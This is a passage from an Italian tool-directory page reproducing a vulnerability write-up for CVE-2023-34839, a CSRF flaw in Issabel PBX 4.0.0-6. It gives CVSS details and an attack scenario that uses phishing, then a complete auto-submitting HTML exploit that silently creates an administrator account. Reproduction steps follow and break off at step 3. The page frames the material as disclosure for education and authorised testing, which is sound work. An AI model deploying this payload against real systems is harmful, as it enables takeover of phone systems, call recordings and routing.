Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-34839 — CVE-2023-34839 è una vulnerabilità di Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma di comunicazione unificata open-source ampiamente utilizzata. | Kitploit
Strumenti/GitHubGitHub/sahiloj/cve-2023-34839
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 è una vulnerabilità di Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma di comunicazione unificata open-source ampiamente utilizzata.

Vedi Repository
53127 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-34839 — Issabel PBX 4.0.0-6: CSRF a Escalation dei Privilegi

CVE Severity CVSS Affected Version


Indice

  • Panoramica
  • Dettagli della Vulnerabilità
  • Software Affetto
  • Punteggio CVSS
  • Scenario di Attacco
  • Proof of Concept (PoC)
  • Passaggi per la Riproduzione
  • Impatto
  • Rimedio
  • Riferimenti
  • Disclaimer

Panoramica

CVE-2023-34839 è una vulnerabilità Cross-Site Request Forgery (CSRF) scoperta in Issabel PBX versione 4.0.0-6, una piattaforma di comunicazione unificata open-source ampiamente utilizzata. La vulnerabilità risiede nell'endpoint di gestione degli utenti e consente a un attaccante remoto non autenticato di creare silenziosamente un nuovo account amministratore, inducendo un amministratore attualmente autenticato a visitare una pagina web appositamente predisposta.

CampoValore
ID CVECVE-2023-34839
Data23 Giugno 2023
RicercatoreSahil Ojha
FornitoreIssabel
ProdottoIssabel PBX
Versione4.0.0-6
Testato suWindows

Dettagli della Vulnerabilità

Issabel PBX 4.0.0-6 non implementa protezioni CSRF (ad esempio, token sincronizzatore, attributi del cookie SameSite o validazione delle intestazioni Origin / Referer) sull'endpoint di creazione utente:

POST /index.php?menu=userlist&action=new

Poiché l'applicazione si basa esclusivamente sui cookie di sessione per l'autenticazione e non esegue alcuna validazione delle richieste che modificano lo stato, una richiesta POST contraffatta proveniente da qualsiasi origine verrà accettata ed elaborata con tutti i privilegi della sessione dell'amministratore autenticato.

Causa principale: Assenza di validazione del token anti-CSRF sugli endpoint amministrativi che modificano lo stato.

Classe di vulnerabilità: CWE-352 — Cross-Site Request Forgery (CSRF)


Software Affetto

SoftwareVersioneStato
Issabel PBX4.0.0-6Vulnerabile ✔
  • Homepage del fornitore: https://www.issabel.org/
  • Codice sorgente: https://github.com/IssabelFoundation/issabelPBX

Punteggio CVSS

MetricaValore
Vettore CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Punteggio Base8.8 (Alto)
Vettore d'attaccoRete
Complessità dell'attaccoBassa
Privilegi richiestiNessuno
Interazione utenteRichiesta (visita amministratore)
AmbitoInvariato
RiservatezzaAlta
IntegritàAlta
DisponibilitàAlta

Scenario di Attacco

Un attaccante può sfruttare questa vulnerabilità seguendo questi passaggi ad alto livello:

  1. Creare una pagina HTML malevola contenente un modulo nascosto che punta all'endpoint di creazione utente di Issabel PBX con valori controllati dall'attaccante (nome utente, password, gruppo = amministratore).
  2. Ospitare la pagina malevola su un server o inviarla all'amministratore target tramite email di phishing, messaggio chat o qualsiasi vettore di ingegneria sociale.
  3. Attendere che l'amministratore apra il link mentre ha una sessione attiva e autenticata con l'applicazione Issabel PBX.
  4. Il browser invia automaticamente il modulo utilizzando il cookie di sessione esistente della vittima, causando la creazione silenziosa di un nuovo account amministratore da parte dell'applicazione.
  5. L'attaccante effettua il login con le credenziali appena create e ottiene accesso completo come amministratore al sistema PBX, inclusi routing delle chiamate, registrazioni, configurazione dei trunk SIP e tutte le impostazioni di sistema.

Non è richiesta altra interazione oltre a una singola visita alla pagina da parte della vittima.


Proof of Concept (PoC)

⚠️ Solo per scopi educativi e test autorizzati.
Sostituire localhost con il nome host o l'indirizzo IP dell'istanza Issabel PBX target.
Se si effettuano test contro un endpoint https:// con un certificato autofirmato, è necessario prima visitare l'URL target nello stesso browser e accettare l'avviso del certificato; altrimenti il browser bloccherà l'invio del modulo cross-origin.

<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Il file exploit è disponibile anche in questo repository: CSRF Exploit.html


Passaggi per la Riproduzione

Prerequisiti

  • Un'istanza funzionante di Issabel PBX 4.0.0-6.
  • Un account amministratore con una sessione attiva nel browser.
  • Un browser sulla stessa macchina della sessione dell'amministratore.

Passaggio 1 — Effettuare il login a Issabel PBX come Amministratore

Navigare all'interfaccia web di Issabel PBX e accedere con le credenziali di amministratore.

Issabel PBX Login


Passaggio 2 — Preparare l'Exploit CSRF

Copiare il codice HTML del PoC sopra e salvarlo come file .html, sostituendo localhost con il nome host o l'indirizzo IP effettivo dell'istanza Issabel target.

L'exploit utilizza campi del modulo nascosti per inviare silenziosamente una richiesta POST di creazione di un nuovo utente all'applicazione. Quando la pagina viene caricata, il JavaScript incorporato invia immediatamente il modulo senza alcuna azione visibile da parte dell'utente.

CSRF Exploit HTML


Passaggio 3 — Aprire l'Exploit nello Stesso Browser

Scarica lo strumento